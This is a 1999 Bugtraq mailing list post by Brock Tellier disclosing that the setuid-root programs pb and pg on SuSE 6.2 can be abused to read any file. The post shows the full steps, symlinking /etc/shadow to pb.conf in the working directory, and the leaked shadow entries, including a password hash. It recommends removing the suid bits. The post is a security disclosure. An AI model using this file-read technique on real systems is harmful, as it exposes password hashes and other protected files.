Bugtraq mailing list archives
Two SuSE 6.2 local root exploits
From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:06:24 -0500
Greetings, /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow any user to read any file on the system as shown: susebox:/root # ls -la /usr/bin/pb uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb susebox:/root # strace /usr/bin/pb ... personality(PER_LINUX) = 0 getpid() = 16623 brk(0) = 0x805032c brk(0x80504cc) = 0x80504cc brk(0x8051000) = 0x8051000 open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory) write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory ) = 41 _exit(1) = ? susebox:/root # --- xnec@susebox:/tmp > id uid=1001(xnec) gid=100(users) groups=100(users) xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf xnec@susebox:/tmp > pb Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::> Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::> Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::> Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::> ... etc for the entire shadow file The same scenario for /usr/bin/pg's pg.conf in your cwd. These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com
Current thread:
- Re: IE5 allows executing programs, (continued)
- Re: IE5 allows executing programs David LeBlanc (Sep 07)
- re, anti btrom Martin Markovitz (Sep 08)
- Re: IE5 allows executing programs Paul L Schmehl (Sep 08)
- SDI AMD remote exploit for RH linux Thiago (Sep 02)
- Re: IE5 allows executing programs J MacCraw (Sep 07)
- Re: IE5 allows executing programs David LeBlanc (Sep 03)
- Re: IE5 allows executing programs Kragen Sitaker (Sep 05)
- Re: IE5 allows executing programs Jesper M. Johansson (Sep 08)
- Re: IE5 allows executing programs SysAdmin (Sep 08)
- Re: IE5 allows executing programs Haxor, Wikit (Sep 16)
- Two SuSE 6.2 local root exploits Brock Tellier (Sep 16)
- SuSE 6.2 /usr/bin/sccw read any file Brock Tellier (Sep 16)
- Fw: CERT Advisory CA-99.12 - Buffer Overflow in amd morex (Sep 16)
- More fun with WWWBoard David Weins (Sep 17)
- Re: More fun with WWWBoard Chris Ridd (Sep 20)
- Re: More fun with WWWBoard Mark Jeftovic (Sep 21)
- Re: More fun with WWWBoard Patrick Oonk (Sep 22)
- Re: More fun with WWWBoard Speed (Sep 24)
- Re: More fun with WWWBoard Mark Jeftovic (Sep 26)
- Microsoft Security Bulletin (MS99-037) Aleph One (Sep 25)
- Internet Explorer 5.0 & AOL Instant Messenger 3.x (latest version) Bug forcing Win98 to crash remotely webmaster (Sep 22)